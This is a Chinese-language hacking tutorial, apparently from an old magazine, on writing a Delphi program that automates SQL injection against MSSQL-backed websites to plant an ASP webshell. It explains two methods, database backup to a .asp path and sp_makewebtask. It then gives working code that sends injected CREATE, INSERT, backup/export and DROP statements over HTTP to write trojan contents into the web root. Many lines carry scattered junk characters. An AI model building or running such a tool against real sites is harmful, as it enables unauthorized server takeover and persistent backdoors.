SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
- P4 w, y' [; n* f* c) F再来看看CZY的方法吧。
CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
1 f: x; r/ F2 T: P0 m. j& }以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
4 C+ C, F5 U/ \" ~$ N二．利用DELPHI去实现功能的前言
. A0 {8 R! D; [1 C9 c原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。
7 D3 \) Q! u# ~# t4 P( H, c# Q
三．如何利用DELPHI得到WEBSHELL。
1 @3 d1 _0 v/ m" n' L程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
& V' d% D0 u- e3 x/ _, Z7 L/ ?1 i4 B首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：
2 H/ j* ~4 m2 m1 {- s! `5 i  a8 L
# p4 z& `  I. z) U, H5 n
9 e! U0 m. ~5 A' I; g& z( b( c+ j
7 {2 `  P2 ~, m% }- ^/ {! G现在来写程序了。
我们首先定义一个RECORD。
如下：
' c# i$ i1 m6 V- ?- XType
4 w$ p1 O1 C1 W, f0 ]. ^0 cSetOption = Record
TableName : String; //用来保存要创建的表名.
, P. h1 D. ]' l; {FieldName : String; //用来保存要创建的字段名.
  I# n3 @" i0 V, m8 SFiledType : String; //用来保存创建的字段名类型.
End;
FiledType字段类型的值是以下类型的一种：
( |( P+ @# r: dBigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
Smallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
再定义一个全局变量：
Var
ISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
代码如下：
procedure TMainForm.FormCreate(Sender: TObject);
begin
sOption.TableName :='cyfd'
, `+ ?9 J3 `' B  w7 L) ~8 R  ~' F; D2 \sOption.FieldName :='gmemo'
sOption.FiledType :='text'
4 d0 F2 w4 `! I- Aend;
+ y, x4 ?' k9 J7 i4 {# T0 w现在我们添加开始执行命令的代码。
先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
4 R! n7 Z' n: G7 Z) L/ d创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
% i6 X- |% g! o9 w  [/ {$ a在程序开始执行前,我们得先检查一下用户的输入
* I0 g9 b, X3 o  M定义一个Checkinput函数.
如下：
Function CheckInput : Boolean;
- u0 y( k( }% y. r: l- NBegin
+ T2 ]$ p0 K0 K9 M& T0 Q# XResult := False;
' h8 E1 E! j7 Lif Trim(urlet.Text) = '' then
# `$ K# k8 G, J% t4 BBegin
Application.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
Exit;
% F2 `$ {/ D6 TEnd;
if Trim(ShellPathET.Text) = '' then
, W5 {1 y, B! e$ hBegin
# n6 Z' N, y8 p$ i, MApplication.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
- m( ~, I2 T6 K, V/ p; c) rExit;
# v0 ?0 W, v$ q( |5 ^5 dEnd;
  i0 U/ s8 }7 F6 r  C6 @IF DefBDoor.Checked then
, V- d& p: k. K& k- y6 OBegin
if Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
Begin
9 c; ~$ G7 N- L9 E( |Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
Exit;
% z7 B6 W  A# N9 Y% JEnd;
End
Else
" \4 E: j; M8 a' R$ T+ eif Not FileExists(CustomBdoorET.Text) then
Begin
, J' Y0 N2 q" ^Application.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
& M3 h, A7 a8 ?9 a* o$ {Exit;
End;
4 ~3 l6 H0 d  t7 j% SResult := True;
End;
  H: n# N! C* A3 I$ r在最开始加入:
: O& o( U0 h" l6 C; |9 gIF Not CheckInput then Exit; //如果输入不合法就退出过程.
好了，如果用户输入没什么错，我们就来下面的代码。
首先我们把IsStop设为假。创建BdoorList。
BDoorList := TstringList.Create;
: o! @% |( g1 W4 }) x再加木马内容到BDoorlist.
BDoorList.LoadFromFile(CustomBdoorET.text);
好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
代码如下：
BDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
1 }9 ]9 e1 W* k' h( w# X  ]! q: l+ |1 LBDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
接下来.我们就提交建表的功能了.
% z  m" n! n+ `+ V/ cMemo.Lines.Add('建表...');
Memo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
7 i8 ^' h/ _1 k5 z/ c这样我们就创建了一个表。然后.我们向表中加记录:
3 B/ v! r0 k1 }0 U代码如下:
; f( k3 [% c: K, g% vMemo.Lines.Add('加数据...');
  W& h1 }& o5 e$ sMemo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
Begin
7 S) {0 r$ T5 z5 S% h5 M  ~- SIF IsStop then //这里如果点了停止按纽程序将终止任务.
Begin
BDoorList.Free;
, _- W+ H& d# V6 jExit;
6 N4 Z5 a8 w& h# T! }3 B0 @3 EEnd; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
8 k1 K2 \9 V+ d+ `$ Z3 U; \. fMemo.Lines.Add('Add Line '+Inttostr(i+1));
# C: u% o6 n* T* I3 [; L/ Q1 I* _End;
, w, v- K- v3 L. S& g现在就是导出数据生成木马了.
4 z( W9 U$ y$ [* F' J3 W. t+ sMemo.Lines.Add('导出数据...');
+ ]3 _% j. y" @; b, BMemo.Lines.Add('');
IF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
7 w6 ^0 M$ o  b2 rNMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
+ Q: {+ |  T6 m* e* w) m. ?0 ^- C$ aElse //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
这样我们的任务就完成了。下面来释放变量.
BDoorList.Free;
" S3 Y) L) L3 ?& v+ }) r再来向停止按纽中添加点击事件：
一行代码就行了：IsStop := True;
8 L3 \6 S& G+ q2 P8 q' `7 e5 \到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
, p; u4 V* e9 ~" q" h0 y+ Y- M% f设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
2 f# {4 l8 h) \: M第一个名称为：TableNameET //保用户输入的存临时表
第二个名称为：FieldNameET //用来保存用户输入的字段名.
再添加一个Combobox　//用来保存用户所选的字段类型值.
, ~: _* @2 W1 u! h9 Q, }名称：FieldTypeCombox
OK.界面如下：
' s6 t: n5 F; g
代码如下:
% r" n5 K  Y1 Q1 I8 q定义一个过程,主表单好调用这个设置。
Procedure ShowSet;
8 c  V' _0 e: j  uBegin
! Z( g9 X: f* [( W4 PApplication.CreateForm(TSetForm,SetForm);
# O' q+ I% u/ s; MWith SetForm do
Begin
TableNameET.Text := sOption.TableName;
FieldNameET.Text := sOption.FieldName;
FieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
End;
% m" @. t2 r* k, D$ q# d/ z% n2 p. x: hSetForm.ShowModal;
& Y0 U- l# P/ b, ]) u& @2 H, jSetForm.Free;
8 Z. l9 t: s/ z8 M' EEnd;
- V4 f: v, o  i' L9 r1 Q在主表单中设置的点击事件中添加上showset过程就行了。
, z+ _4 b* H; ^% O9 F2 b$ [$ F下面就是点击确定的代码了。
IF CheckInput then
Begin
2 j* H2 O9 {, ]+ L$ q8 WsOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
, D6 Z7 S6 E8 P/ Y3 ^; h9 M$ ZsOption.FiledType := FieldTypeCombox.Text;
Close;
3 u$ B5 B" q! z5 ]) W% E# iEnd;
7 G# k5 V3 t9 d) R0 j' A& \( p' e这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
  A: X# z) d5 ]& `  ]代码如下:
Function CheckInput : Boolean;
* b# |& C# ?& xBegin
$ E5 Z9 q0 u8 r% L; G3 fResult := False;
' @3 G& @6 [0 v' y# v! e4 b* oIF Trim(TableNameET.Text)='' then
! \! Q  t& V& {' L) sBegin
Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
  P, n/ J$ j$ MExit;
5 D$ T+ k6 Y1 W- {) s4 D( f" XEnd;
IF Trim(FieldNameET.Text)='' then
! x% B$ Q* P: _. @2 I- d* Y# d: ~Begin
+ s5 ~+ L5 H- Y2 yApplication.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
1 O5 a$ N9 M3 k2 G$ NExit;
End;
Result := True;
End;
' ^# d9 K) W8 V7 M6 G到这里程序就完了。</P>